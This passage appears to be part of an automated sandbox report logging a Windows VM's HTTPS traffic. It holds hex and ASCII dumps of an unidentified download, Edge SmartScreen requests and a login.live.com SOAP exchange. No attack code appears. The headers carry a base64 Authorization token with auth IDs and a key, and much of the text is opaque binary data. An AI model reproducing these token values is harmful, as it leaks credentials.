                                                                                                                                                                                                                                                                                                                  Data Ascii: kD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-x$$QifD`7
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5
                                                                                                                                                                                                                                                                                                                  Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3
                                                                                                                                                                                                                                                                                                                  Data Ascii: MR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1
                                                                                                                                                                                                                                                                                                                  Data Ascii: yfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1
                                                                                                                                                                                                                                                                                                                  Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53
                                                                                                                                                                                                                                                                                                                  Data Ascii: u\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22
                                                                                                                                                                                                                                                                                                                  Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO|4"
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f
                                                                                                                                                                                                                                                                                                                  Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>uBRC)@7g_


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  38192.168.2.84981320.25.227.1744431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 746
                                                                                                                                                                                                                                                                                                                  Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                  Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiZ1BlWVREclJyM2hFcVlMdE9qYUtZUT09IiwgImhhc2giOiJOV0VBclZ2MHhGdz0ifQ==
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                  If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:42 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 57
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                                                                                                                                                                  ETag: "638343870221005468"
                                                                                                                                                                                                                                                                                                                  Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 9murmur3,MhZ8\<&LiH[?m


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                  39192.168.2.84981240.126.53.18443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                  Content-Length: 4722
                                                                                                                                                                                                                                                                                                                  Host: login.live.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:43 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 14:47:42 GMT
                                                                                                                                                                                                                                                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                  x-ms-route-info: C516_BL2
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: ac95cb7a-895e-490a-b46d-5f324a1f8ca5
                                                                                                                                                                                                                                                                                                                  PPServer: PPV: 30 H: BL02EPF0001D7C0 V: 0
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:42 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 10197
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:43 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  40192.168.2.84981720.25.227.1744431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:43 UTC698OUTPOST /api/browser/edge/data/settings/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 746
                                                                                                                                                                                                                                                                                                                  Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                  Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiZ1BlWVREclJyM2hFcVlMdE9qYUtZUT09IiwgImhhc2giOiJOV0VBclZ2MHhGdz0ifQ==
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                  If-None-Match: "2.0-0"
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:43 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:43 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 130439
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                                                                                                                                                                  ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
                                                                                                                                                                                                                                                                                                                  Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16082INData Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC16384INData Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a
